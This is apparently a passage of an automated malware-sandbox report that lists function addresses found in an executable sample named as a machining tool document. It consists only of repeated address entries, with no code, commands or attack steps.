            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D46B011_2_385D46B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D179811_2_385D1798
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D001411_2_385D0014
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DF81011_2_385DF810
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DF80011_2_385DF800
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D10A911_2_385D10A9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DD12711_2_385DD127
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D821811_2_385D8218
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D822811_2_385D8228
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DC34711_2_385DC347
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D8BD011_2_385D8BD0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DF3B811_2_385DF3B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DF3A911_2_385DF3A9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DFC6811_2_385DFC68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DE57111_2_385DE571
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DE58011_2_385DE580
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D1E7011_2_385D1E70
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D46A011_2_385D46A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DEF5111_2_385DEF51
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DEF6011_2_385DEF60
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D178811_2_385D1788
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EA8E811_2_385EA8E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EA29011_2_385EA290
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E8BA011_2_385E8BA0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385ED25F11_2_385ED25F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E275811_2_385E2758
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E415811_2_385E4158
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E345211_2_385E3452
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EC95011_2_385EC950
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E1A5011_2_385E1A50
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EF24F11_2_385EF24F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E874811_2_385E8748
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E0D4811_2_385E0D48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E274911_2_385E2749
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E004011_2_385E0040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E7A4011_2_385E7A40
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EE94011_2_385EE940
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E1A4111_2_385E1A41
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E5B7811_2_385E5B78
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E957811_2_385E9578
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EFB7511_2_385EFB75
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385ED27011_2_385ED270
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E4E7011_2_385E4E70
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EB26F11_2_385EB26F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E416811_2_385E4168
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E5B6811_2_385E5B68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E346011_2_385E3460
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EF26011_2_385EF260
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E911F11_2_385E911F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EC01F11_2_385EC01F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E4A1811_2_385E4A18
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E3D1011_2_385E3D10
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EB71011_2_385EB710
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E571011_2_385E5710
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E001111_2_385E0011
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EE00F11_2_385EE00F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E300811_2_385E3008
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E4A0811_2_385E4A08
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385ED70011_2_385ED700
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E230011_2_385E2300
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EB70011_2_385EB700
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E3D0111_2_385E3D01
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EC93F11_2_385EC93F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E6D3811_2_385E6D38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E9E3811_2_385E9E38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E0D3811_2_385E0D38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E873811_2_385E8738
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E913011_2_385E9130
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EC03011_2_385EC030
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E7A3011_2_385E7A30
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EE93011_2_385EE930
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E9E2A11_2_385E9E2A
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E6D2811_2_385E6D28
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EE02011_2_385EE020
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E572011_2_385E5720
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EA7DE11_2_385EA7DE
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E75D811_2_385E75D8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385ECDD211_2_385ECDD2
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E5FD011_2_385E5FD0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EEDD011_2_385EEDD0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E99D011_2_385E99D0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E52C811_2_385E52C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EEDC211_2_385EEDC2
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EC4C011_2_385EC4C0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E45C011_2_385E45C0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E5FC111_2_385E5FC1
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E15F811_2_385E15F8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E2FF811_2_385E2FF8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E08F011_2_385E08F0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E82F011_2_385E82F0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EADF011_2_385EADF0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EF6F011_2_385EF6F0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E22F011_2_385E22F0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385ED6F011_2_385ED6F0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E75E811_2_385E75E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E15E811_2_385E15E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E08E211_2_385E08E2
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385ECDE011_2_385ECDE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E99E011_2_385E99E0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E82E011_2_385E82E0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EADE011_2_385EADE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EF6E011_2_385EF6E0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E049811_2_385E0498
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E7E9811_2_385E7E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E1E9811_2_385E1E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EBB9211_2_385EBB92
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E719011_2_385E7190
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EDB9011_2_385EDB90
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E119111_2_385E1191
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E8B9111_2_385E8B91
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E958811_2_385E9588
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E048911_2_385E0489
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E7E8911_2_385E7E89
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EB28011_2_385EB280
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EFB8011_2_385EFB80
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E718011_2_385E7180
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EA28011_2_385EA280
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EDB8111_2_385EDB81
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E38B811_2_385E38B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E52B911_2_385E52B9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E2BB011_2_385E2BB0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EE4B011_2_385EE4B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EC4B011_2_385EC4B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E1EA811_2_385E1EA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E38A811_2_385E38A8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E11A011_2_385E11A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EBBA011_2_385EBBA0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E2BA011_2_385E2BA0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EE4A011_2_385EE4A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C861E811_2_38C861E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8D97011_2_38C8D970
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C836C811_2_38C836C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8E7C811_2_38C8E7C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A4C911_2_38C8A4C9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8CFCF11_2_38C8CFCF
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8BCC011_2_38C8BCC0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C879C011_2_38C879C0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A4D811_2_38C8A4D8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C83FD811_2_38C83FD8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C860D811_2_38C860D8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C804D011_2_38C804D0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C879D011_2_38C879D0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8FAD711_2_38C8FAD7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C83FE811_2_38C83FE8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8FAE811_2_38C8FAE8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C81FEA11_2_38C81FEA
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8CFE011_2_38C8CFE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C80DE011_2_38C80DE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C88CE011_2_38C88CE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8B7E711_2_38C8B7E7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C81FF811_2_38C81FF8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8B7F811_2_38C8B7F8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C816FF11_2_38C816FF
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C80DF011_2_38C80DF0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C88CF011_2_38C88CF0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8E2F111_2_38C8E2F1
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C848F711_2_38C848F7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C874F711_2_38C874F7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8248811_2_38C82488
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8C18811_2_38C8C188
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C84D8811_2_38C84D88
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8128011_2_38C81280
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8968011_2_38C89680
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8EC8111_2_38C8EC81
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C87E8711_2_38C87E87
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C84D9811_2_38C84D98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C87E9811_2_38C87E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8D49811_2_38C8D498
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8669F11_2_38C8669F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8EC9011_2_38C8EC90
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A99011_2_38C8A990
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C82DA811_2_38C82DA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8D4A811_2_38C8D4A8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C891A911_2_38C891A9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A9A011_2_38C8A9A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C82DA211_2_38C82DA2
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C856A711_2_38C856A7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C856B811_2_38C856B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C891B811_2_38C891B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8E7B911_2_38C8E7B9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C804BF11_2_38C804BF
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C866B011_2_38C866B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8BCB011_2_38C8BCB0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C836B711_2_38C836B7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C85B4811_2_38C85B48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C89B4811_2_38C89B48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C83B4811_2_38C83B48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8004011_2_38C80040
